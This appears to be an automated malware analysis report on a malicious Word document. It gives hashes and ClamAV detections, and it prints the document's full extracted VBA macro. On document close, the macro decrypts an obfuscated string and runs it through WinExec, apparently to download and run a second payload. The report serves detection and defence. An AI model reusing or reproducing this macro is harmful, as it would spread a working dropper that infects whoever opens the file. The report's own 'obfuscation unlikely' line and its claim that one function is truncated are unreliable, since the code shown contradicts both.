Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 901354b147cba30d…

MALICIOUS

Office (OOXML)

45.0 KB Created: 2017-05-22 22:37:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-08-04
MD5: 10a9c65499b1921019f9704b9d461f5a SHA-1: f6229c6a1b417d24451b86e7d40318f221d53b32 SHA-256: 901354b147cba30d916c0dc57a74fd24cfb44c20bcbe950aaff3e32856ea220e
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OOXML document containing VBA macros. The 'macros.bas' script includes a function 'palazzina' that appears to decrypt and then execute a command using WinExec. The script also contains a function 'splendido' which is truncated but seems to be intended to execute the decrypted command. This indicates the document is designed to download and execute a secondary payload.

Heuristics 3

  • ClamAV: Doc.Malware.Xenon-10059125-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Xenon-10059125-0
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4808 bytes
SHA-256: 898fb378e7a197a35578f5f4b99e074fdc764f8a9cc81b9ecd42f1ab16a9635d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

#If Win64 Then
Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal salgemma As String, ByVal divelto As Long) As Long
#ElseIf Win32 Then
Private Declare Function WinExec Lib "kernel32" (ByVal salgemma As String, ByVal divelto As Long) As Long
#End If


Public Function palazzina(inumidire As String, eremita As String) As String
  
  Dim gasolio As Integer
  Dim adipe As Integer
  Dim udire
  Dim rodaggio As String
  Dim unte As String
  Dim prolunga As String
  Dim fare As String
  Dim cedrata As Integer

  rodaggio = sfruttato(eremita, Len(inumidire))
  eremita = rodaggio
  unte = ""
  

  For udire = 1 To (LenB(inumidire) / 2)

    gasolio = sierra(Mid(eremita, udire, 1))
    prolunga = Mid(inumidire, udire, 1)
    adipe = Asc(prolunga)
    cedrata = bilancia(adipe, gasolio)
    unte = Chr(cedrata) + unte + RTrim("")
    
  Next
  
  palazzina = unte
  
End Function

Public Function giudizio(crostata As String)
  crostata = Replace(crostata, "", "")
  Call splendido(crostata)
End Function

Public Sub folclore()
  Dim giocare As String
  Dim mancia As String
  Dim rifasare As String
  Dim dovuto As String

  giocare = "EDDDCDDDBEBECECCBEEBCE"
  rifasare = LTrim("")
  Application.Run Trim("giudizio"), palazzina(valanga(), giocare)
End Sub

Public Function splendido(sarto As String)
  Dim offerta As Integer
 
  If Len(ActiveDocument.Content.Text) <> 2 Then
    offerta = WinExec(StrReverse(sarto + " " & palazzina("eof0gzg", "BB")), Len(""))
  End If
End Function

Public Function bilancia(attrito As Integer, carapace As Integer) As Integer
  bilancia = Int(attrito - carapace - 1)
End Function

Public Function sfruttato(esagono As String, ghisa As Integer) As String
   Dim gittata As Integer
   Dim africano As String
   africano = esagono
   
   Dim dinnanzi As Integer
   dinnanzi = 0
   
   For gittata = (LenB(esagono) / 2) To ghisa - 1
     If dinnanzi = (LenB(esagono) / 2) Then
       dinnanzi = 0
     End If
     
     africano = africano & Mid(esagono, (((dinnanzi) + 1) - 0), 1)
     
     dinnanzi = dinnanzi + 1
   Next
   
   sfruttato = africano
End Function


Public Function sierra(posa As String)
  Dim nettuno As String
  Dim sfinge As Integer
  nettuno = "ABCDEF"
  
  Dim currentposa As String

  For sfinge = 1 To 5
    currentposa = Mid(nettuno, sfinge, 1)
    If currentposa = RTrim(posa) Then
       sierra = sfinge - 1
    End If
    
  Next
  
End Function

Private Sub Document_Close()
  If 2 = (1 + 1) Then
    Application.Run "folclore"
  End If
End Sub

Public Function valanga()
  Dim spegnere As String

  spegnere = "4g$tr{ivumgqo%0qqu%/H"

  spegnere = spegnere + "}jg$F|tewu%/Hrrpdpi%*"
  spegnere = spegnere + "Qj|1Sfmigx""X{xwjp1Pj"
  spegnere = spegnere + "y0ZjgGpmhrx-0Iq|qqrdf"
  spegnere = spegnere + "Knnh-,lxxs>33p{p{q{qy"

  spegnere = spegnere + "eghdf}g|2grq3rksq4sts"


  spegnere = spegnere + "rd3rfi,1$(iqz>ERUFFWF"
  spegnere = spegnere + "#."",avqkr2i|h+-?""Xv"
  spegnere = spegnere + "fuy0Stthgvx%(iry>ETRI"


  spegnere = spegnere + "CYD,_wpkr0h}j+?,Qi{1Q"
  spegnere = spegnere + "gljfy#V{xygp3Six2ZifG"
  spegnere = spegnere + "nngsw.1Gq|snrfiWxvlrk"


  spegnere = spegnere + ",)mvys?22p{sxq{szgfff"
  spegnere = spegnere + "g|d}0hrr2v0umrBniAtss"
  spegnere = spegnere + "sf++"


  valanga = spegnere

End Function

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1C8CEDB2-20C0-476E-8BA9-343463B63BAF}{5FED400E-130E-419F-AAC0-33FA318974CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{BDA89CFE-85EC-4CD8-808E-8ABA60549A47}{C714152F-E517-48F7-90DF-EF4490E07F00}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 27136 bytes
SHA-256: b99841a1c0781260d0c4908e2fec82343bb7259f353758ba7a64864623bc25a1
Detection
ClamAV: Doc.Malware.Xenon-10059125-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.